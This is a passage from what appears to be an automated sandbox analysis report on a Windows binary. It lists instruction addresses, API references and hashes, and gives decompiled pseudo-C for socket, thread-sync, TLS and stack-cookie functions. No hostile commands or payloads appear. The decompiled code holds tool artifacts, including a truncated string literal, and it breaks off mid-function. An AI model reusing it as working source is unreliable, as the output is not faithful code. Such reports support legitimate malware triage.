0x0040d7f1
0x0040d7f8
0x0040d7fb
0x0040d802
0x0040d805
0x0040d80c
0x0040d812
0x0040d819
0x0040d820
0x0040d827
0x0040d82e
0x0040d83a
0x0040d83d
0x0040d844
0x0040d84b
0x0040d852
0x0040d85e
0x0040d867
0x0040d86c
0x0040d874
0x0040d879
0x0040d910
0x0040d918
0x00000000
0x0040d87f
0x0040d87f
0x0040d882
0x0040d885
0x0040d888
0x0040d893
0x0040d89c
0x0040d8a2
0x0040d8a7
0x0040d8c8
0x0040d8c8
0x0040d8cd
0x0040d8d4
0x0040d8de
0x0040d8e8
0x0040d8f0
0x0040d8f1
0x0040d8f2
0x0040d900
0x0040d8a9
0x0040d8a9
0x0040d8ac
0x0040d8b7
0x0040d8b9
0x0040d8c1
0x0040d8c6
0x0040d91d
0x0040d91d
0x0040d922
0x0040d925
0x0040d92a
0x0040d92b
0x0040d92c
0x0040d92d
0x0040d92e
0x0040d92f
0x0040d930
0x0040d933
0x0040d935
0x0040d940
0x0040d944
0x0040d945
0x0040d946
0x0040d947
0x0040d94c
0x0040d94c
0x0040d94e
0x0040d952
0x0040d958
0x0040d95b
0x0040d95d
0x0040d960
0x0040d962
0x0040d965
0x0040d967
0x0040d96e
0x0040d971
0x0040d971
0x0040d973
0x0040d974
0x0040d974
0x0040d978
0x0040d97a
0x0040d97c
0x0040d982
0x0040d984
0x0040d987
0x0040d98a
0x0040d98d
0x0040d98f
0x0040d9a8
0x0040d9a8
0x0040d9ab
0x0040d9b0
0x0040d9b3
0x0040d991
0x0040d991
0x0040d9a1
0x0040d9a1
0x0040d9a3
0x0040d993
0x0040d993
0x0040d995
0x00000000
0x0040d997
0x0040d997
0x0040d999
0x00000000
0x0040d99b
0x0040d99b
0x00000000
0x0040d99d
0x0040d99d
0x0040d99f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d99f
0x0040d99b
0x0040d999
0x0040d995
0x0040d991
0x0040d9b6
0x0040d9b9
0x0040d9bb
0x0040d9be
0x0040d9c0
0x0040d9ca
0x0040d9cd
0x0040d9cf
0x0040d9cf
0x0040d9d1
0x0040d9db
0x0040d9dd
0x0040d9e1
0x0040d9e7
0x0040d9ea
0x0040d9ec
0x0040da0b
0x0040da0b
0x0040d9ee
0x0040d9ee
0x0040d9f0
0x00000000
0x0040d9f2
0x0040d9f4
0x0040d9fa
0x0040d9fc
0x0040d9fe
0x0040da01
0x0040da06
0x0040da06
0x0040d9f0
0x0040d9e3
0x0040d9e3
0x0040d9e3
0x0040da0d
0x0040da10
0x0040da17
0x0040da19
0x0040da25
0x0040da29
0x0040da35
0x0040da38
0x0040da77
0x0040da77
0x0040da86
0x0040da8c
0x0040da8f
0x0040dabd
0x0040dabd
0x0040da91
0x0040da91
0x0040da93
0x00000000
0x0040da95
0x0040da95
0x0040da95
0x0040da97
0x00000000
0x00000000
0x0040da99
0x0040da9f
0x0040daa4
0x0040daac
0x0040dab2
0x0040dab8
0x0040dabb
0x0040dac4
0x0040dac7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040da9b
0x0040da9b
0x0040da9d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040da9d
0x00000000
0x0040da99
0x0040dacc
0x0040dacc
0x0040dacc
0x0040da93
0x0040da3a
0x0040da3a
0x0040da40
0x0040da40
0x0040da42
0x00000000
0x00000000
0x0040da44
0x0040da4a
0x0040da4f
0x0040da57
0x0040da5d
0x0040da63
0x0040da66
0x0040da6d
0x0040da70
0x00000000
0x0040da68
0x0040da68
0x0040da68
0x0040da68
0x0040da46
0x0040da46
0x0040da48
0x00000000
0x00000000
0x00000000
0x00000000
0x0040da48
0x00000000
0x0040da44
0x0040da75
0x00000000
0x0040da75
0x0040dace
0x0040dad0
0x0040dad3
0x0040dadb
0x0040db05
0x0040da1b
0x0040da1b
0x0040da1b
0x0040db0c
0x0040db16
0x0040db1c
0x0040db23
0x0040db29
0x0040db2c
0x0040db2e
0x0040db32
0x0040db32
0x0040db38
0x0040db41
0x0040db45
0x0040db47
0x0040db4b
0x0040db4b
0x0040db53
0x0040db61
0x00000000
0x00000000
0x00000000
0x0040d8c6
0x0040d8a7
0x0040d879

APIs

Part of subcall function 00401EF0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000000,149E0ABF), ref: 00401F30
Part of subcall function 00401EF0: GetLastError.KERNEL32(?,80000000,149E0ABF), ref: 00401F3A

Part of subcall function 00402B30: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00402B75
Part of subcall function 00402B30: VerifyVersionInfoW.KERNEL32(?,00000002,00000000), ref: 00402B84

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF), ref: 0040D89C
GetLastError.KERNEL32 ref: 0040D8B1

Strings

mutex, xrefs: 0040D903, 0040D910
iocp, xrefs: 0040D91D

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLast$CompletionConditionCountCreateCriticalInfoInitializeMaskPortSectionSpinVerifyVersion
String ID: iocp$mutex
API String ID: 2929831146-1266449624
Opcode ID: 642be22eca2f1445a64076a2c189a72c5b79a24154ffb0e769fbf3a3eef63132
Instruction ID: 09e163edbc58dca7f4f81eaeb9ff548fd6310cbce5feb493ddd43fd1a690c074
Opcode Fuzzy Hash: 642be22eca2f1445a64076a2c189a72c5b79a24154ffb0e769fbf3a3eef63132
Instruction Fuzzy Hash: AF514BB1D00A069BDB14DF69C55579EBBB0FF48314F10822EE814AB780D7B8A954CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00423C5A Relevance: 6.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMTD ref: 0042429B
_write_string.LIBCMTD ref: 004242B6
_write_multi_char.LIBCMTD ref: 004242E2

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: _write_multi_char$_write_string
String ID:
API String ID: 2640999400-0
Opcode ID: d76790cd42983bbcdde22c79ebb45eede6f31338e6fb0e3ba354c57646f43948
Instruction ID: 98c5c5eba90c8d079708d3f089f674da33f3f0917225af5ffb108671f4b0bb9f
Opcode Fuzzy Hash: d76790cd42983bbcdde22c79ebb45eede6f31338e6fb0e3ba354c57646f43948
Instruction Fuzzy Hash: 5DA190B0A002289BDB24DF55DC85BAEB374EB84305F5044EAE6097B282D77C9E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 004267F1 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

___libm_error_support.LIBCMTD ref: 004268A5

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: ___libm_error_support
String ID:
API String ID: 2356892068-0
Opcode ID: 75b71e84c8c1a3dc00faa8288a30552b741c6ae673a3a9bd16edddf64cd6e85b
Instruction ID: aded79ae84299d850cfceadd366af04ba0fc017bc686f281cc1d26ef5656c311
Opcode Fuzzy Hash: 75b71e84c8c1a3dc00faa8288a30552b741c6ae673a3a9bd16edddf64cd6e85b
Instruction Fuzzy Hash: BB412571D15A049ACF11BB39EA0616EB7B0EF91344F50CB6FE8C865251EF388A59C34B

Uniqueness

Uniqueness Score: -1.00%

Function 004030E0 Relevance: 6.1, APIs: 4, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E004030E0(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				signed int _v28;
				signed int _v52;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				char _v548;
				char _v576;
				char _v580;
				intOrPtr _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t28;
				char* _t30;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr* _t39;
				void* _t40;
				void* _t41;
				void* _t49;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t56;
				void* _t57;
				signed int _t58;

				_t48 = __edx;
				_t60 = (_t58 & 0xfffffff8) - 0x22c;
				_t23 =  *0x41b014; // 0x149e0abf
				_v8 = _t23 ^ (_t58 & 0xfffffff8) - 0x0000022c;
				_v276 = 1;
				_v540 = 1;
				_v272 = __ecx;
				_v536 = __ecx;
				_t28 = __ecx + 1;
				_v548 = 0;
				_t39 = __edx;
				_v544 = 0;
				__imp__#18(_t28, 0,  &_v276,  &_v540,  &_v548, _t49, _t53, _t38);
				if(_t28 != 0) {
					_v576 = 0;
					if(__ecx != 0xffffffff) {
						__imp__#112(0);
						_v576 = 4;
						_t30 =  &_v580;
						__imp__#7(__ecx, 0xffff, 0x1007, _t30,  &_v576);
						_t50 = _t30;
						_t31 = E00412970();
						__imp__#111();
						 *__edx = _t31;
						 *((intOrPtr*)(__edx + 4)) = _t31;
						if(_t50 == 0) {
							_t34 = E00412970();
							 *__edx = _t50;
							 *((intOrPtr*)(__edx + 4)) = _t34;
							if(_v600 == _t50) {
								_t35 = E00412970();
								 *__edx = 0;
							} else {
								_t35 = E00412970();
								 *__edx = _v600;
							}
							goto L8;
						}
					} else {
						_t35 = E00412970();
						 *__edx = 0x2719;
						L8:
						 *((intOrPtr*)(_t39 + 4)) = _t35;
					}
					_pop(_t51);
					_pop(_t56);
					_pop(_t40);
					return E00412A1E(1, _t40, _v52 ^ _t60, _t48, _t51, _t56);
				} else {
					_pop(_t52);
					_pop(_t57);
					_pop(_t41);
					return E00412A1E(0, _t41, _v28 ^ _t60, __edx, _t52, _t57);
				}
			}

0x004030e0
0x004030e6
0x004030ec
0x004030f3
0x00403101
0x0040310f
0x0040311b
0x0040312a
0x00403131
0x00403134
0x0040313d
0x0040313f
0x00403147
0x0040314f
0x00403168
0x00403173
0x00403184
0x0040318e
0x00403197
0x004031a7
0x004031ad
0x004031af
0x004031b6
0x004031bc
0x004031be
0x004031c3
0x004031c5
0x004031ca
0x004031cc
0x004031d3
0x004031e2
0x004031e7
0x004031d5
0x004031d5
0x004031de
0x004031de
0x00000000
0x004031d3
0x00403175
0x00403175
0x0040317a
0x004031ed
0x004031ed
0x004031ed
0x004031f9
0x004031fa
0x004031fb
0x00403206
0x00403151
0x00403153
0x00403154
0x00403155
0x00403167
0x00403167

APIs

select.WS2_32(?,00000000,?,00000001,?), ref: 00403147

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 6a3ca92ae871383dc128b715796a269fd54d2127d686b1a40bb3985d6fc1e585
Instruction ID: 322bda9760da7c253c731ca799ef5f2e198fbf82ba8adfcf189c0ba9408ecc7a
Opcode Fuzzy Hash: 6a3ca92ae871383dc128b715796a269fd54d2127d686b1a40bb3985d6fc1e585
Instruction Fuzzy Hash: FC31A4B15043009FC720DF65D5457DBBBE8EF88355F00466EE888DB290DB748944CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00412BEC Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00412BEC(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x41e1e8;
				if(_t7 == 0) {
					LeaveCriticalSection(0x41e1d0);
					_t3 = WaitForSingleObjectEx( *0x41e1cc, _a4, 0);
					EnterCriticalSection(0x41e1d0);
					return _t3;
				}
				 *0x415318(0x41e1c8, 0x41e1d0, _a4);
				return  *_t7();
			}

0x00412bf0
0x00412bf8
0x00412c19
0x00412c2a
0x00412c31
0x00000000
0x00412c31
0x00412c09
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,00412B89,00000064), ref: 00412C0F
LeaveCriticalSection.KERNEL32(0041E1D0,?,?,00412B89,00000064,?,?,?,004012FF,0041E1C4,149E0ABF,?,00414D36,000000FF), ref: 00412C19
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00412B89,00000064,?,?,?,004012FF,0041E1C4,149E0ABF,?,00414D36,000000FF), ref: 00412C2A
EnterCriticalSection.KERNEL32(0041E1D0,?,00412B89,00000064,?,?,?,004012FF,0041E1C4,149E0ABF,?,00414D36,000000FF), ref: 00412C31

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: a29235bc6c1807ef5da8b3e31d7a8d981a0822d1df7e61a74ff4e8db2477e2d3
Instruction ID: 11d6ef25701b32f98038a51a6e1056cc34da374c859752f61c2fae711071103a
Opcode Fuzzy Hash: a29235bc6c1807ef5da8b3e31d7a8d981a0822d1df7e61a74ff4e8db2477e2d3
Instruction Fuzzy Hash: D9E09239540A24FBCB112B92EC08FCDBF15AB49B90B148032FE05A3160C7B55A919BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00412A1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00412A1E(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t10;
				intOrPtr _t15;
				signed int _t16;
				signed int _t18;
				signed int _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				void* _t36;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_t36 = _t24 -  *0x41b014; // 0x149e0abf
				if(_t36 != 0) {
					_t31 = _t33;
					_t10 = IsProcessorFeaturePresent(0x17);
					if(_t10 != 0) {
						_t24 = 2;
						asm("int 0x29");
					}
					 *0x41e320 = _t10;
					 *0x41e31c = _t24;
					 *0x41e318 = _t27;
					 *0x41e314 = _t23;
					 *0x41e310 = _t29;
					 *0x41e30c = _t28;
					 *0x41e338 = ss;
					 *0x41e32c = cs;
					 *0x41e308 = ds;
					 *0x41e304 = es;
					 *0x41e300 = fs;
					 *0x41e2fc = gs;
					asm("pushfd");
					_pop( *0x41e330);
					 *0x41e324 =  *_t31;
					 *0x41e328 = _v0;
					 *0x41e334 =  &_a4;
					 *0x41e270 = 0x10001;
					_t15 =  *0x41e328; // 0x0
					 *0x41e22c = _t15;
					 *0x41e220 = 0xc0000409;
					 *0x41e224 = 1;
					 *0x41e230 = 1;
					_t16 = 4;
					 *((intOrPtr*)(0x41e234 + _t16 * 0)) = 2;
					_t18 = 4;
					_t25 =  *0x41b014; // 0x149e0abf
					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
					_t20 = 4;
					_t26 = E0041B010; // 0xeb61f540
					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
					return E004132D4(" \xef\xbf				} else {
					return __eax;
				}
			}

0x00412a1e
0x00412a1e
0x00412a1e
0x00412a1e
0x00412a1e
0x00412a1e
0x00412a24
0x004132fd
0x00413307
0x0041330f
0x00413313
0x00413314
0x00413314
0x00413316
0x0041331b
0x00413321
0x00413327
0x0041332d
0x00413333
0x00413339
0x00413340
0x00413347
0x0041334e
0x00413355
0x0041335c
0x00413363
0x00413364
0x0041336d
0x00413375
0x0041337d
0x00413388
0x00413392
0x00413397
0x0041339c
0x004133a6
0x004133b0
0x004133bc
0x004133c0
0x004133cc
0x004133d0
0x004133d6
0x004133dc
0x004133e0
0x004133e6
0x004133f5
0x00412a26
0x00412a26
0x00412a26

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00413307
___raise_securityfailure.LIBCMT ref: 004133EF

Strings

A, xrefs: 004133EA

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: A
API String ID: 3761405300-390959529
Opcode ID: 186024294bec017eb9f3e050376b9c1a961b9a11d724973e04fb239e431abb4d
Instruction ID: 56cc654d48b1db408154f2c16378dfa527cdf755360a7bb205cbeeb4dd7739bd
Opcode Fuzzy Hash: 186024294bec017eb9f3e050376b9c1a961b9a11d724973e04fb239e431abb4d
Instruction Fuzzy Hash: BD21E3B85103099AE714CF16F955AC47BE4BB0C710F50C47AED24873A2E3B4A5808F4D

Uniqueness

Uniqueness Score: -1.00%

Function 004026D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E004026D0(void* __ebx, void* __ecx, void* __edi) {
				signed int _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr* _v20;
				void* __esi;
				void* __ebp;
				signed int _t37;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr* _t54;
				char* _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr* _t67;
				char* _t69;
				void* _t73;
				long _t74;
				void* _t75;
				intOrPtr _t76;
				signed int _t80;

				_t68 = __edi;
				_t53 = __ebx;
				_t82 = (_t80 & 0xfffffff8) - 0xc;
				_t37 =  *0x41b014; // 0x149e0abf
				_v8 = _t37 ^ (_t80 & 0xfffffff8) - 0x0000000c;
				_t39 = __ecx + 0x1c;
				_t65 =  *_t39;
				 *_t39 = 1;
				if( *_t39 != 0) {
					L4:
					_pop(_t73);
					return E00412A1E(_t39, _t53, _v8 ^ _t82, _t65, _t68, _t73);
				} else {
					_t39 = __ecx + 0x20;
					_t74 =  *_t39;
					 *_t39 = 1;
					if(_t74 != 0 || PostQueuedCompletionStatus( *(__ecx + 0x14), _t74, _t74, _t74) != 0) {
						goto L4;
					} else {
						_t75 = GetLastError();
						_v16 = _t75;
						_v12 = E00412970();
						if(_t75 != 0) {
							_t59 =  &_v16;
							_t42 = E00401CE0(_t59, "pqcs", __edi, _t75);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(__ebx);
							_t54 = _v16;
							_push(_t75);
							_push(__edi);
							_t69 = _t59;
							_t76 =  *_t54;
							if(_t76 != 0) {
								_t60 = _t76;
								_t67 = PostQueuedCompletionStatus;
								_v12 = EnterCriticalSection;
								_v20 = PostQueuedCompletionStatus;
								_v16 = LeaveCriticalSection;
								do {
									_t45 =  *((intOrPtr*)(_t60 + 0x14));
									 *_t54 = _t45;
									if(_t45 == 0) {
										 *((intOrPtr*)(_t54 + 4)) = _t45;
									}
									 *((intOrPtr*)(_t60 + 0x14)) = 0;
									 *(_t76 + 0x1c) = 1;
									_t42 =  *_t67( *((intOrPtr*)(_t69 + 0x14)), 0, 0, _t76);
									if(_t42 == 0) {
										_v12(_t69 + 0x38);
										 *((intOrPtr*)(_t76 + 0x14)) = 0;
										_t48 =  *((intOrPtr*)(_t69 + 0x58));
										if(_t48 == 0) {
											 *((intOrPtr*)(_t69 + 0x54)) = _t76;
										} else {
											 *((intOrPtr*)(_t48 + 0x14)) = _t76;
										}
										 *((intOrPtr*)(_t69 + 0x58)) = _t76;
										_t49 =  *_t54;
										if(_t49 != 0) {
											_t63 = _t76;
											if(_t63 == 0) {
												 *((intOrPtr*)(_t69 + 0x54)) = _t49;
											} else {
												 *((intOrPtr*)(_t63 + 0x14)) = _t49;
											}
											 *((intOrPtr*)(_t69 + 0x58)) =  *((intOrPtr*)(_t54 + 4));
											 *_t54 = 0;
											 *((intOrPtr*)(_t54 + 4)) = 0;
										}
										 *(_t69 + 0x34) = 1;
										_t42 = _v16(_t69 + 0x38);
									}
									_t76 =  *_t54;
									_t60 = _t76;
									_t67 = _v20;
								} while (_t76 != 0);
							}
							return _t42;
						} else {
							goto L4;
						}
					}
				}
			}

0x004026d0
0x004026d0
0x004026d6
0x004026d9
0x004026e0
0x004026ea
0x004026ef
0x004026ef
0x004026f3
0x00402727
0x0040272b
0x00402736
0x004026f5
0x004026f5
0x004026f8
0x004026f8
0x004026fc
0x00000000
0x0040270e
0x00402714
0x00402716
0x0040271f
0x00402725
0x0040273c
0x00402740
0x00402745
0x00402746
0x00402747
0x00402748
0x00402749
0x0040274a
0x0040274b
0x0040274c
0x0040274d
0x0040274e
0x0040274f
0x00402756
0x00402757
0x0040275a
0x0040275b
0x0040275c
0x0040275e
0x00402762
0x0040276d
0x0040276f
0x00402775
0x0040277d
0x00402780
0x00402783
0x00402783
0x00402786
0x0040278a
0x0040278c
0x0040278c
0x00402792
0x0040279b
0x004027a5
0x004027a9
0x004027af
0x004027b2
0x004027b9
0x004027be
0x004027c5
0x004027c0
0x004027c0
0x004027c0
0x004027c8
0x004027cb
0x004027cf
0x004027d1
0x004027d5
0x004027dc
0x004027d7
0x004027d7
0x004027d7
0x004027e2
0x004027e5
0x004027eb
0x004027eb
0x004027fa
0x00402800
0x00402800
0x00402803
0x00402805
0x00402807
0x0040280a
0x00402783
0x00402818
0x00000000
0x00000000
0x00000000
0x00402725
0x004026fc

APIs

PostQueuedCompletionStatus.KERNEL32(00000001,00000001,00000001,00000001), ref: 00402704
GetLastError.KERNEL32 ref: 0040270E

Strings

pqcs, xrefs: 00402737

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CompletionErrorLastPostQueuedStatus
String ID: pqcs
API String ID: 1506555858-2559862021
Opcode ID: 10b048b7cdca3cf86be3ad46815b33f67c760835415d36c9dd37c6b9c593b3ea
Instruction ID: da26fc5946964663996f6d73bf47b77dcd8fa29ac59b704b20c3b5097feeb801
Opcode Fuzzy Hash: 10b048b7cdca3cf86be3ad46815b33f67c760835415d36c9dd37c6b9c593b3ea
Instruction Fuzzy Hash: 4401A7709016219FC7269F14DA4599B7BA4EF84794F50817EE8489B290EB74CC01C6DA

Uniqueness

Uniqueness Score: -1.00%

Function 00401DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401DC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				signed char _v24;
				void* __ebp;
				signed int _t11;
				long _t13;
				void* _t19;
				void* _t21;
				intOrPtr* _t22;
				signed char _t24;
				intOrPtr* _t32;
				void* _t34;
				signed char _t37;
				void* _t40;
				void* _t42;
				void* _t43;
				signed int _t46;
				signed int _t48;

				_t34 = __edx;
				_t23 = __ebx;
				_t48 = (_t46 & 0xfffffff8) - 0x10;
				_t11 =  *0x41b014; // 0x149e0abf
				_v8 = _t11 ^ _t48;
				_push(__esi);
				_push(__edi);
				_t13 = TlsAlloc();
				_t39 = _t13;
				if(_t13 != 0xffffffff) {
					L2:
					_pop(_t40);
					_pop(_t42);
					return E00412A1E(_t39, _t23, _v8 ^ _t48, _t34, _t40, _t42);
				} else {
					_t43 = GetLastError();
					_v16 = _t43;
					_v12 = E00412970();
					if(_t43 != 0) {
						E00401CE0( &_v16, "tss", _t39, _t43);
						asm("int3");
						asm("int3");
						asm("int3");
						_push(__ebx);
						_t24 = _v24;
						_t19 = TlsGetValue( *0x41e598);
						if(_t19 == 0) {
							L10:
							_t21 = E00412C3A(_t24 + 1, _t24, _t39, _t43, _t24 + 1);
							_t31 =  >  ? 0 : _t24 & 0x000000ff;
							 *((char*)(_t21 + _t24)) =  >  ? 0 : _t24 & 0x000000ff;
							return _t21;
						} else {
							_t32 =  *((intOrPtr*)(_t19 + 4));
							if(_t32 == 0) {
								goto L10;
							} else {
								_t22 =  *_t32;
								if(_t22 == 0) {
									goto L10;
								} else {
									 *_t32 = 0;
									_t37 =  *_t22;
									if((_t37 & 0x000000ff) < _t24) {
										_push(_t22);
										L00412FD0();
										_t48 = _t48 + 4;
										goto L10;
									} else {
										 *(_t22 + _t24) = _t37;
										return _t22;
									}
								}
							}
						}
					} else {
						goto L2;
					}
				}
			}

0x00401dc0
0x00401dc0
0x00401dc6
0x00401dc9
0x00401dd0
0x00401dd4
0x00401dd5
0x00401dd6
0x00401ddc
0x00401de1
0x00401dfc
0x00401e02
0x00401e03
0x00401e0e
0x00401de3
0x00401de9
0x00401deb
0x00401df4
0x00401dfa
0x00401e18
0x00401e1d
0x00401e1e
0x00401e1f
0x00401e23
0x00401e2a
0x00401e2d
0x00401e35
0x00401e62
0x00401e66
0x00401e79
0x00401e7c
0x00401e81
0x00401e37
0x00401e37
0x00401e3c
0x00000000
0x00401e3e
0x00401e3e
0x00401e42
0x00000000
0x00401e44
0x00401e44
0x00401e4a
0x00401e51
0x00401e59
0x00401e5a
0x00401e5f
0x00000000
0x00401e53
0x00401e53
0x00401e58
0x00401e58
0x00401e51
0x00401e42
0x00401e3c
0x00000000
0x00000000
0x00000000
0x00401dfa

APIs

TlsAlloc.KERNEL32 ref: 00401DD6
GetLastError.KERNEL32 ref: 00401DE3

Strings

tss, xrefs: 00401E0F

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: cd15bf822c2ce0da7a1f50f586a5575da1bcbbe351399244a59567436b038f42
Instruction ID: aa4bbdc2bfb684a56a2d46c10a52cb4acb06c81e633665f805884a329a4a9db4
Opcode Fuzzy Hash: cd15bf822c2ce0da7a1f50f586a5575da1bcbbe351399244a59567436b038f42
Instruction Fuzzy Hash: 1AF090356146044B8320AB79D9050AF37E1EBC4370F408A2EE96597790DB3898108ADB

Uniqueness

Uniqueness Score: -1.00%

Function 00401FB0 Relevance: 5.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00401FB0(struct _CRITICAL_SECTION* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				struct _CRITICAL_SECTION* _v20;
				char _v24;
				struct _CRITICAL_SECTION* _v28;
				signed int _t34;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				intOrPtr* _t52;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t64;
				struct _CRITICAL_SECTION* _t65;
				intOrPtr _t66;
				struct _CRITICAL_SECTION* _t69;
				intOrPtr* _t70;
				signed int _t72;
				void* _t73;
				void* _t74;
				void* _t75;

				_push(0xffffffff);
				_push(0x413b9d);
				_push( *[fs:0x0]);
				_t74 = _t73 - 0xc;
				_t34 =  *0x41b014; // 0x149e0abf
				_push(_t34 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_t69 = __ecx;
				_v20 = __ecx;
				_v28 = __ecx;
				EnterCriticalSection(__ecx);
				_v24 = 1;
				_t52 = _a4;
				_v8 = 0;
				_t64 =  *((intOrPtr*)(_t69 + 0x1c));
				if(_t64 == 0) {
					L9:
					LeaveCriticalSection(_t69);
					_v24 = 0;
					_t70 = _a8( *((intOrPtr*)(_t69 + 0x18)));
					_t75 = _t74 + 4;
					_t65 = _v20;
					 *((intOrPtr*)(_t70 + 4)) =  *_t52;
					 *((intOrPtr*)(_t70 + 8)) =  *((intOrPtr*)(_t52 + 4));
					EnterCriticalSection(_t65);
					_t66 =  *((intOrPtr*)(_t65 + 0x1c));
					if(_t66 == 0) {
						_t39 = _v20;
						goto L20;
					} else {
						do {
							_t58 =  *((intOrPtr*)(_t66 + 8));
							if(_t58 == 0) {
								L13:
								_t59 =  *((intOrPtr*)(_t66 + 4));
								if(_t59 == 0) {
									goto L16;
								} else {
									_t42 =  *_t52;
									if(_t42 == 0) {
										goto L16;
									} else {
										_t24 = _t59 + 4; // 0x4
										_t44 = _t24;
										__imp____std_type_info_compare(_t44, _t42 + 4);
										_t75 = _t75 + 8;
										if(_t44 == 0) {
